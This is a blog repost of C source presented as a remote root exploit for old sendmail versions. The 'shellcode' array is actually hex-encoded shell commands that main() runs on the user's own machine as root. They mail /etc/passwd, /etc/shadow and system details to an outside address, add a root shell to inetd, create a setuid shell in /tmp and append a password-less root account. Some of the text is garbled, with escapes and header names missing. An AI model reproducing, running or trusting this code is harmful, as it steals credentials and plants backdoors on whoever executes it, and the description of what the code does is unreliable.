ITPub博客

首页 > IT基础架构 > 网络安全 > Sendmail

Sendmail

原创 网络安全 作者:coolwinds 时间:2005-07-04 13:51:53 0 删除 编辑
Exploit for new sendmail vulnerability - discovered again - by Michal Zalewski.
securityfocus link: http://www.securityfocus.com/archive/1/337839?
This exploit will work against sendmail <= 8.12.9 on Linux, *BSD and Solaris.
###>>> If everything is ok, you will find shell on target box, port 31337
NOTE: This exploit is very powerful, and only root can use it.
Have a nice time with this exploit ;-).
[@more@]#include
#include
#include
#include
#include
#include
#include
#include
#include
#include


#define SMTPPORT 25


/*?improved tcp port (31337) bind shellcode */
char asmcode[]=
"x65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx22x20x3ex20x69x6ex66x6fx2ex70x68"
"x75x6ex3bx65x63x68x6fx20x24x55x53x45x52x20x24x4fx53"
"x54x59x50x45x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6e"
"x3bx65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2e"
"x70x68x75x6ex3bx75x6ex61x6dx65x20x2dx61x20x3ex3ex20"
"x69x6ex66x6fx2ex70x68x75x6ex3bx65x63x68x6fx20x22x2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx22"
"x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6ex3bx69x66x63"
"x6fx6ex66x69x67x20x3ex3ex20x69x6ex66x6fx2ex70x68x75"
"x6ex3bx65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6f"
"x2ex70x68x75x6ex3bx63x61x74x20x2fx65x74x63x2fx68x6f"
"x73x74x73x20x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6e"
"x3bx65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2e"
"x70x68x75x6ex3bx63x61x74x20x2fx65x74x63x2fx70x61x73"
"x73x77x64x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6ex3b"
"x65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2ex70"
"x68x75x6ex3bx63x61x74x20x2fx65x74x63x2fx73x68x61x64"
"x6fx77x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6ex3bx65"
"x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2ex70x68"
"x75x6ex3bx63x61x74x20x69x6ex66x6fx2ex70x68x75x6ex20"
"x7cx20x6dx61x69x6cx20x68x34x78x30x72x68x34x78x33x72"
"x40x68x6fx74x6dx61x69x6cx2ex63x6fx6dx3bx65x63x68x6f"
"x20x62x67x70x20x20x73x74x72x65x61x6dx20x20x74x63x70"
"x20x20x20x20x20x6ex6fx77x61x69x74x20x20x72x6fx6fx74"
"x20x20x20x20x2fx62x69x6ex2fx73x68x20x2fx62x69x6ex2f"
"x73x68x20x2dx69x20x3ex3ex20x2fx65x74x63x2fx69x6ex65"
"x74x64x2ex63x6fx6ex66x3bx6bx69x6cx6cx61x6cx6cx20x2d"
"x48x55x50x20x69x6ex65x74x64x3bx63x70x20x2fx62x69x6e"
"x2fx73x68x20x2fx74x6dx70x2fx2ex67x6fx74x69x74x2dx24"
"x55x53x45x52x3bx63x68x6dx6fx64x20x34x37x37x37x20x2f"
"x74x6dx70x2fx2ex67x6fx74x69x74x2dx24x55x53x45x52x3b"
"x65x63x68x6fx20x30x77x6ex75x3ax3ax30x3ax30x3ax30x77"
"x6ex75x3ax2fx72x6fx6fx74x3ax2fx62x69x6ex2fx73x68x20"
"x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64x3bx70x77"
"x63x6fx6ex76x3b";

int rev(int a){
? int i=1;
? if((*(char*)&i)) return(a);
? return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}

char msg[] = "0day HACKING w4r3z!!!";

int main(int argc,char **argv){

?struct hostent *hp;
?struct sockaddr_in adr;
?char buffer[1024],*b,*ls = asmcode;
?int count;
?int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
?
?printf ("-------------------------------------------------------n");
?printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATEn");
?printf (" >>> SENDMAIL <= 8.12.9 REMOTE EXPLOIT by 0wN-U << ?printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATEn");
?printf ("-------------------------------------------------------n");

?
? if (getuid() != 0)
? {
??printf ("Sorry!!!n");
??printf ("This is very dangerous exploit for whole internet, and that's why only root users can use it!!!n");
??printf ("Sorry kiddies :-))))n");
??exit(0);
? }

? if(argc<2){
?? printf("USAGE: %s address portnum typen",argv[0]);
?? printf("address - target addressn");
?? printf("portnum - should be 25n");
?? printf("type - linux, openbsd, freebsd, netbsd, sunosn");
?? system(ls);exit(-1);
? }
?
? while((c=getopt(argc-1,&argv[1],"se"))!=-1){
??? switch(c){
??? case 's': flag=1;break;
??? case 'e': flag=2;
??? }
? }
?
? sck[0]=socket(AF_INET,SOCK_DGRAM,0);
? sck[1]=socket(AF_INET,SOCK_STREAM,0);
? printf (" o? Exploiting sendmail on %s - wait for r00t shell..",argv[1]);
? system(ls);for (count=0;count<10;count++)
? {printf(".");fflush(stdout);sleep(1); }
? adr.sin_family=AF_INET;
? adr.sin_port=htons(53);
? if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
??? if((hp=gethostbyname(argv[1]))==NULL) {
??? }
? }
? if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0);
? if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0);
? printf ("n o? Exploit failed :-(((, try to run it on another machine!!!n");
? exit(-1);
? i=sizeof(struct sockaddr_in);
? if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
??? struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
??? struct netbuf nb;
??? ioctl(sck[1],(('S'<<8)|2),"sockmod");
??? nb.maxlen=0xffff;
??? nb.len=sizeof(struct sockaddr_in);;
??? nb.buf=(char*)&adr;
??? ioctl(sck[1],(('T'<<8)|144),&nb);
? }
? n=ntohs(adr.sin_port);

? asmcode[4+48+2]=(unsigned char)((n>>8)&0xff);
? asmcode[4+48+3]=(unsigned char)(n&0xff);

? if(write(sck[0],msg,sizeof(msg))==-1) goto err;
? if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
?
? printf("stack dump:n");
? for(i=0;i<(cnt-512);i++){
??? printf("%s%02x ",(i&&(!(i%16)))?"n":"",(unsigned char)buffer[512+i]);
? }
? printf("nn");

? fp=rev(*(unsigned int*)&buffer[532]);
? ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);
? cnt=163;

? if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){
??? printf("system does not seem to be a vulnerable linuxn");exit(1);
? }
? if(flag==1){
??? printf("system seems to be running sendmail, OK :-)n");exit(-1);
? }
? if(cnt<(ofs+28)){
??? printf("frame ptr is too low to be successfully exploitedn");exit(-1);
? }


? jmp=rev(fp-586);
? ptr6=rev((fp&0xffffff00)-12);
? fp=rev(fp&0xffffff00);

? printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
? printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);

? b=buffer;
? memcpy(b,"xabxcdx01x00x00x02x00x00x00x00x00x01",12);b+=12;
? for(i=0;i ? for(i=0;i<(128>>1);i++,b++) *b++=0x01;
? memcpy(b,"x00x00x01x00x01",5);b+=5;
? for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;

? *b++=28;
? memcpy(b,"x06x00x00x00",4);b+=4;
? memcpy(b,&fp,4);b+=4;
? memcpy(b,"x06x00x00x00",4);b+=4;
? memcpy(b,&jmp,4);b+=4;
? memcpy(b,&jmp,4);b+=4;
? memcpy(b,&fp,4);b+=4;
? memcpy(b,&ptr6,4);b+=4;

? cnt-=ofs+28;
? for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;

? memcpy(b,"x00x00x01x00x01x00x00xfaxff",9);b+=9;


? if(write(sck[0],buffer,b-buffer)==-1) goto err;
? sleep(1);printf("sent!n");

? write(sck[1],"/bin/uname -an",14);
? while(1){
??? fd_set fds;
??? FD_ZERO(&fds);
??? FD_SET(0,&fds);
??? FD_SET(sck[1],&fds);
??? if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
????? int cnt;
????? char buf[1024];
????? if(FD_ISSET(0,&fds)){
??????? if((cnt=read(0,buf,1024))<1){
????????? if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
????????? else break;
??????? }
??????? write(sck[1],buf,cnt);
????? }
????? if(FD_ISSET(sck[1],&fds)){
??????? if((cnt=read(sck[1],buf,1024))<1){
????????? if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
????????? else break;
??????? }
??????? write(1,buf,cnt);
????? }
??? }
? }
? exit(0);
err:
? perror("error");exit(-1);
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-801604/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    950394